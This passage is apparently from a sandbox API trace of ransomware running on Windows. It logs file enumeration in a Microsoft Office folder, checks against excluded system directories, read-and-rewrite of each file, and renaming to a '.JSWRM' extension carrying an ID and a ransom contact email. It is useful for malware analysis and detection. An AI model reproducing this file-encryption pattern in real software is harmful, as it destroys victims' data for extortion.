lpWideCharStr="PGMN044.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN044.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN044.XML", lpUsedDefaultChar=0x0) returned 11 [0139.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN044.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN044.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN044.XML", lpUsedDefaultChar=0x0) returned 11 [0139.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN044.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn044.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.195] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5138) returned 1 [0139.195] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.195] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1410, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1410, lpOverlapped=0x0) returned 1 [0139.200] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.200] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1410, lpOverlapped=0x0) returned 1 [0139.200] CloseHandle (hObject=0x238) returned 1 [0139.200] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN044.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn044.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN044.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn044.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.201] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xae7d2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN048.XML", cAlternateFileName="")) returned 1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2=".") returned 1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="..") returned 1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="...") returned 1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="windows") returned -1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="recovery") returned -1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="perflogs") returned 1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="documents and settings") returned 1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="system volume information") returned -1 [0139.201] lstrcmpiW (lpString1="PGMN048.XML", lpString2="msocache") returned 1 [0139.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN048.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN048.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN048.XML", lpUsedDefaultChar=0x0) returned 11 [0139.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN048.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.201] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN048.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN048.XML", lpUsedDefaultChar=0x0) returned 11 [0139.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN048.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn048.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.203] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=714706) returned 1 [0139.203] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.203] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.242] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.242] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.242] CloseHandle (hObject=0x238) returned 1 [0139.243] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN048.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn048.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN048.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn048.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.245] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5ee242, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8250, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN054.XML", cAlternateFileName="")) returned 1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2=".") returned 1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="..") returned 1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="...") returned 1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="windows") returned -1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="recovery") returned -1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="perflogs") returned 1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="documents and settings") returned 1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="system volume information") returned -1 [0139.245] lstrcmpiW (lpString1="PGMN054.XML", lpString2="msocache") returned 1 [0139.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN054.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN054.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN054.XML", lpUsedDefaultChar=0x0) returned 11 [0139.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN054.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN054.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN054.XML", lpUsedDefaultChar=0x0) returned 11 [0139.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN054.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn054.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.246] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33360) returned 1 [0139.247] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.247] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8250, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x8250, lpOverlapped=0x0) returned 1 [0139.251] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.251] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8250, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x8250, lpOverlapped=0x0) returned 1 [0139.252] CloseHandle (hObject=0x238) returned 1 [0139.252] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN054.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn054.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN054.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn054.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.253] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5ee242, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN058.XML", cAlternateFileName="")) returned 1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2=".") returned 1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="..") returned 1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="...") returned 1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="windows") returned -1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="recovery") returned -1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="perflogs") returned 1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="documents and settings") returned 1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="system volume information") returned -1 [0139.253] lstrcmpiW (lpString1="PGMN058.XML", lpString2="msocache") returned 1 [0139.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN058.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN058.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN058.XML", lpUsedDefaultChar=0x0) returned 11 [0139.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN058.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN058.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN058.XML", lpUsedDefaultChar=0x0) returned 11 [0139.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN058.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn058.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.254] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2276) returned 1 [0139.255] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.255] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8e0, lpOverlapped=0x0) returned 1 [0139.256] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.256] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8e0, lpOverlapped=0x0) returned 1 [0139.256] CloseHandle (hObject=0x238) returned 1 [0139.257] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN058.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn058.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN058.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn058.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.258] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5c7ff6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5c7ff6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5c7ff6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbb8c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN065.XML", cAlternateFileName="")) returned 1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2=".") returned 1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="..") returned 1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="...") returned 1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="windows") returned -1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="recovery") returned -1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="perflogs") returned 1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="documents and settings") returned 1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="system volume information") returned -1 [0139.258] lstrcmpiW (lpString1="PGMN065.XML", lpString2="msocache") returned 1 [0139.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN065.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN065.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN065.XML", lpUsedDefaultChar=0x0) returned 11 [0139.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN065.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN065.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN065.XML", lpUsedDefaultChar=0x0) returned 11 [0139.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN065.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn065.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.259] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=48012) returned 1 [0139.259] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.259] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xbb80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xbb80, lpOverlapped=0x0) returned 1 [0139.263] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.263] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xbb80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xbb80, lpOverlapped=0x0) returned 1 [0139.264] CloseHandle (hObject=0x238) returned 1 [0139.264] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN065.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn065.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN065.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn065.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.265] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d7457f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d7457f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d76b9e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9ff4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGMN075.XML", cAlternateFileName="")) returned 1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2=".") returned 1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="..") returned 1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="...") returned 1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="windows") returned -1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="recovery") returned -1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="perflogs") returned 1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="documents and settings") returned 1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="system volume information") returned -1 [0139.265] lstrcmpiW (lpString1="PGMN075.XML", lpString2="msocache") returned 1 [0139.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN075.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN075.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN075.XML", lpUsedDefaultChar=0x0) returned 11 [0139.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN075.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0139.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGMN075.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGMN075.XML", lpUsedDefaultChar=0x0) returned 11 [0139.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGMN075.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pgmn075.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.270] GetFileSizeEx (in: hFile=0x238, 